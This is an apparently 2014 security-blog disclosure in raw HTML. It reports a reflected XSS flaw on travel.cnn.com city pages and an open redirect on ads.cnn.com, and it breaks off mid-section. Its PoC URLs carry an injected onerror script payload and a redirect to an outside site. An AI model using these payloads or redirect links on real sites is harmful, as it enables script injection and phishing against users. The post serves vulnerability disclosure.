<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Vulnerability Description:</span></b></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">The programming bug flaws occur at "/city/<wbr></wbr>all" pages. All links under this URL are vulnerable to XSS attacks, e.g</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="http://travel.cnn.com/city/all/all/washington?page=0%2C1" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://travel.cnn.com/city/<wbr></wbr>all/all/washington?page=0%2C1</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="http://travel.cnn.com/city/all/all/tokyo/all?page=0%2C1" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://travel.cnn.com/city/<wbr></wbr>all/all/tokyo/all?page=0%2C1</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;">XSS may allow a remote attacker to create a specially crafted request that would execute arbitrary script code in a user's browser session within the trust relationship between their browser and the server. Base on Acunetix, exploited XSS is commonly used to achieve the following malicious results</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<ul>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Identity theft</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Accessing sensitive or restricted information</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Gaining free access to otherwise paid for content</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Spying on user’s web browsing habits</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Altering browser functionality</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Public defamation of an individual or corporation</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Web application defacement</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Denial of Service attacks</span></li>
</ul>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">The code programming flaw can be exploited without user login. Tests were performed on Firefox (34.0) in Ubuntu (14.04) and IE (9.0.15) in Windows 7.</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2P2lj15KOys4BpNXJtXYgJPh4-omrlhHmpzRuDrdu0txHBJnYcti7wbKWFVj-NNbVeRE4_3qeMWQCCrrl83IUVavQRng1eo5tYnIcRMQtqdAIYHPF9OyHk50eaNq8nXe-MDSd6cAAJTc/s1600/cnn_travel_city_xss1.png" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><span style="color: black; font-family: Arial, Helvetica, sans-serif;"><img border="0" height="253" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2P2lj15KOys4BpNXJtXYgJPh4-omrlhHmpzRuDrdu0txHBJnYcti7wbKWFVj-NNbVeRE4_3qeMWQCCrrl83IUVavQRng1eo5tYnIcRMQtqdAIYHPF9OyHk50eaNq8nXe-MDSd6cAAJTc/s400/cnn_travel_city_xss1.png" style="cursor: move;" width="400" /></span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;">PoC:</span></b></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://travel.cnn.com/city/all/all/tokyo/all" target="_blank">http://travel.cnn.com/city/<wbr></wbr>all/all/tokyo/all</a>' /"><img src=x onerror=prompt(/justqdjing/)></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://travel.cnn.com/city/all/all/bangkok/all" target="_blank">http://travel.cnn.com/city/<wbr></wbr>all/all/bangkok/all</a>' /"><img src=x onerror=prompt(/justqdjing/)></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">(1.1) <span style="line-height: 21.7777786254883px; text-align: justify;">Poc Video:</span></span></b></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="color: #333333; font-family: 'Helvetica Neue Light', HelveticaNeue-Light, 'Helvetica Neue', Helvetica, Arial, sans-serif; line-height: 21.7777786254883px; margin: 0px; outline: none; padding: 0px; text-align: justify;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="https://www.youtube.com/watch?v=Cu47XiDV38M&feature=youtu.be" style="-webkit-transition: color 0.3s; color: #009eb8; display: inline; font-family: 'Helvetica Neue Light', HelveticaNeue-Light, 'Helvetica Neue', Helvetica, Arial, sans-serif; outline: none; text-decoration: none; transition: color 0.3s;">https://www.youtube.com/watch?v=Cu47XiDV38M&feature=youtu.be</a></span></div>
</div>
<div style="line-height: 21.7777786254883px; margin: 0px; outline: none; padding: 0px; text-align: justify;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="color: #333333; font-family: 'Helvetica Neue Light', HelveticaNeue-Light, 'Helvetica Neue', Helvetica, Arial, sans-serif; line-height: 21.7777786254883px; margin: 0px; outline: none; padding: 0px; text-align: justify;">
<div style="margin: 0px; outline: none; padding: 0px;">
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Blog Details:</span></b></div>
</div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://securityrelated.blogspot.sg/2014/12/cnn-cnncom-travel-city-related-links.html" style="-webkit-transition: color 0.3s; color: #009eb8; display: inline; font-family: 'Helvetica Neue Light', HelveticaNeue-Light, 'Helvetica Neue', Helvetica, Arial, sans-serif; outline: none; text-decoration: none; transition: color 0.3s;">http://securityrelated.blogspot.com/2014/12/cnn-cnncom-travel-city-related-links.html</a></span></div>
</div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">(2) CNN cnn.com ADS Open Redirect Web Security Bug</span></b></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Domain:</span></b></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">ads.cnn.com</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Vulnerability Description:</span></b></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">The programming code flaw occurs at "event.ng" page with "&Redirect" parameter, i.e.</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="http://ads.cnn.com/event.ng/Type=click&FlightID=92160&AdID=125504&TargetID=1346&RawValues=&Redirect=http:%2f%2fgoogle.com" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://ads.cnn.com/event.ng/<wbr></wbr>Type=click&FlightID=92160&<wbr></wbr>AdID=125504&TargetID=1346&<wbr></wbr>RawValues=&Redirect=http:%2f%<wbr></wbr>2fgoogle.com</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;">From OWASP, an open redirect is an application that takes a parameter and redirects a user to the parameter value without any validation. This vulnerability is used in phishing attacks to get users to visit malicious sites without realizing it. This could allow a user to create a specially crafted URL, that if clicked, would redirect a victim from the intended legitimate web site to an arbitrary web site of the attacker's choosing. Such attacks are useful as the crafted URL initially appear to be a web page of a trusted site. This could be leveraged to direct an unsuspecting user to a web page containing attacks that target client side software such as a web browser or document rendering programs.</span></div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">The vulnerabilities can be attacked without user login. Tests were performed on Microsoft IE (10.0.9200.16750) of Windows 8, Mozilla Firefox (34.0) & Google Chromium 39.0.2171.65-0 ubuntu0.14.04.1.1064 (64-bit) of Ubuntu (14.04),Apple Safari 6.1.6 of Mac OS X Lion 10.7. </span></div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>(2.1) </b>Use the following tests to illustrate the scenario painted above.</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">The redirected webpage address is "<a href="http://webcabinet.tumblr.com/">http://webcabinet.tumblr.com/</a>". Suppose that this webpage is malicious.</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Vulnerable URL:</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="http://ads.cnn.com/event.ng/Type=click&FlightID=92160&AdID=125504&TargetID=1346&RawValues=&Redirect=http:%2f%2fcnn.com" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://ads.cnn.com/event.ng/<wbr></wbr>Type=click&FlightID=92160&<wbr></wbr>AdID=125504&TargetID=1346&<wbr></wbr>RawValues=&Redirect=http:%2f%<wbr></wbr>2fcnn.com</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">POC:</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://ads.cnn.com/event.ng/Type=click&FlightID=92160&AdID=125504&TargetID=1346&RawValues=&Redirect=http:%2f%2ftetraph.com%2Fblog" target="_blank">http://ads.cnn.com/event.ng/<wbr></wbr>Type=click&FlightID=92160&<wbr></wbr>AdID=125504&TargetID=1346&<wbr></wbr>RawValues=&Redirect=http:%2f%<wbr></wbr>2f</a><a href="http://webcabinet.tumblr.com/">webcabinet.tumblr.com</a></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br class="Apple-interchange-newline" /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Since CNN is well-known worldwide, this vulnerability can be used to do "<a href="http://tetraph.com/covert_redirect/">Covert Redirect</a>" attacks to other websites.</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>(2.1) </b><b style="line-height: 21.7777786254883px; text-align: justify;">Poc Video:</b></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="color: #333333; font-family: 'Helvetica Neue Light', HelveticaNeue-Light, 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14.4444446563721px; line-height: 21.7777786254883px; margin: 0px; outline: none; padding: 0px; text-align: justify;">
<div style="margin: 0px;">
